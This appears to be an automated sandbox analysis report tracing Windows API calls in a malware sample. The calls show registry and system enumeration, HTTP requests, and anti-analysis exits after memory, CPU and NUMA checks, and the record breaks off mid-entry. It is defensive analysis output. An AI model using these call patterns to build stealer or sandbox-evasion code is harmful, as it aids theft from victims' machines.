                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID:
                                      • API String ID: 3885987321-0
                                      • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                      • Instruction ID: fb8d6179fda7bab45180705094579d78368cd3d266ec192a883a346b33f76260
                                      • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                      • Instruction Fuzzy Hash: 8F515EB19603199BCF15FBA0DD91EED737EAF54300F8041A8A60B62194EF345B89CFA5
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • RegQueryValueExA.ADVAPI32(00000000,006BF348,00000000,000F003F,?,00000400), ref: 004184EC
                                      • lstrlenA.KERNEL32(?), ref: 00418501
                                      • RegQueryValueExA.ADVAPI32(00000000,006BF558,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
                                      • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                      • Opcode Fuzzy Hash: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
                                      • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction ID: 0ebf7afa77a7499f55e7d8a0e3a91045032743aa6deee66afbcbfd2db8279f76
                                      • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction Fuzzy Hash: DF215BB5D00219ABDF10DFA4E848AED7B75FF44320F008225F925A7290EB706A05CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,00689C98,00000000,00020119,00000000), ref: 004176DD
                                      • RegQueryValueExA.ADVAPI32(00000000,006BF468,00000000,00000000,?,000000FF), ref: 004176FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3466090806-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E790B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E7912
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022E7944
                                      • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022E7965
                                      • RegCloseKey.ADVAPI32(00000000), ref: 022E796F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: abc0e968c0233fa8e894c544106124b9d0fc15a27f8f0594f8b23556f590e95e
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: A0012CB9A80205BBEB10DBE0ED49FADB7B9EB48701F405154FA0597284D6749900DB51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,00689C98,00000000,00020119,004176B9), ref: 0041775B
                                      • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                      • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3466090806-1022791448
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                      APIs
                                      • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :A$:A
                                      • API String ID: 1378416451-1974578005
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                      • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                      • HeapFree.KERNEL32(00000000), ref: 022D76C0
                                        • Part of subcall function 022D94A7: vsprintf_s.MSVCRT ref: 022D94C2
                                      • task.LIBCPMTD ref: 022D77BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                      • String ID:
                                      • API String ID: 700816787-0
                                      • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction ID: 985516c6a567e9979c7789ec1ba92c41fceb340a74dbe4baf8dcf9c2376ddfbd
                                      • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction Fuzzy Hash: D0612BB5D1026C9BDB24DB90CC44FE9B7B9BF48304F0085E9E649A6144DBB4ABC6CF91
                                      APIs
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                        • Part of subcall function 022D64E7: StrCmpCA.SHLWAPI(?,l), ref: 022D656A
                                        • Part of subcall function 022D64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                        • Part of subcall function 022D64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                        • Part of subcall function 022D64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                        • Part of subcall function 022D64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                      • lstrlen.KERNEL32(00000000), ref: 022E5596
                                        • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                      • lstrlen.KERNEL32(00000000), ref: 022E55EA
                                      • strtok.MSVCRT(00000000,?), ref: 022E5605
                                      • lstrlen.KERNEL32(00000000), ref: 022E5615
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID:
                                      • API String ID: 3532888709-0
                                      • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction ID: 1ced987d4e87149b9c0a6b98270ef0a8d6ce9bfccf57fa706730ccda712ff8dc
                                      • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction Fuzzy Hash: C951D6709203489BCF28EFE4CA95AFD7776AF60304FD04018E80B666A8EB746B55DF51
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022E7345
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,022E7574,004205BD), ref: 022E7383
                                      • memset.MSVCRT ref: 022E73D1
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022E7525
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID:
                                      • API String ID: 224852652-0
                                      • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction ID: 446d094d11ffc115d9bd27588527ddb05539baa11e63a0a4d21ca1f5bf8cb074
                                      • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction Fuzzy Hash: A0518FB0C203199BDF24DBE4DC84BEDF775AF44305F9041A9E606A7284EB746A88DF58
                                      APIs
                                      • strtok_s.MSVCRT ref: 00413588
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • strtok_s.MSVCRT ref: 004136D1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpystrtok_s$lstrlen
                                      • String ID:
                                      • API String ID: 3184129880-0
                                      • Opcode ID: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
                                      • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                      • Opcode Fuzzy Hash: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
                                      • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                      APIs
                                      • __lock.LIBCMT ref: 0041B39A
                                        • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                        • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                        • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                      • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                        • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                      • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                      • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                      • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                      • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                      APIs
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0i), ref: 022E9B39
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,xah), ref: 022E9B9A
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,`i), ref: 022E9BE3
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                        • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022D1437: ExitProcess.KERNEL32 ref: 022D1478
                                        • Part of subcall function 022D13C7: GetSystemInfo.KERNEL32(?), ref: 022D13D1
                                        • Part of subcall function 022D13C7: ExitProcess.KERNEL32 ref: 022D13E5
                                        • Part of subcall function 022D1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022D1392
                                        • Part of subcall function 022D1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022D1399
                                        • Part of subcall function 022D1377: ExitProcess.KERNEL32 ref: 022D13AA
                                        • Part of subcall function 022D1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                        • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14BF
                                        • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14CD
                                        • Part of subcall function 022D1487: ExitProcess.KERNEL32 ref: 022D14FB
                                        • Part of subcall function 022E69D7: GetUserDefaultLangID.KERNEL32 ref: 022E69DB
                                        • Part of subcall function 022D13F7: ExitProcess.KERNEL32 ref: 022D142D
                                        • Part of subcall function 022E7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022D141E), ref: 022E7AE7
                                        • Part of subcall function 022E7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E7AEE
                                        • Part of subcall function 022E7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022E7B06
                                        • Part of subcall function 022E7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E7B77
                                        • Part of subcall function 022E7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022E7B7E
                                        • Part of subcall function 022E7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022E7B96
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                      • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                      • ExitProcess.KERNEL32 ref: 022E6D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction ID: 6b802aba971a2a858e44c7199d19aa7b74a3148ea55deb98e58b0bce65c7f0ec
                                      • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction Fuzzy Hash: D7314671A60308ABDF04FBF0DC54BFD737AAF64300F905518A103A6298EF746A44DE61
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
                                      • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                      • Opcode Fuzzy Hash: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
                                      • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                      • ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                      • LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                      • CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                      Memory Dump Source
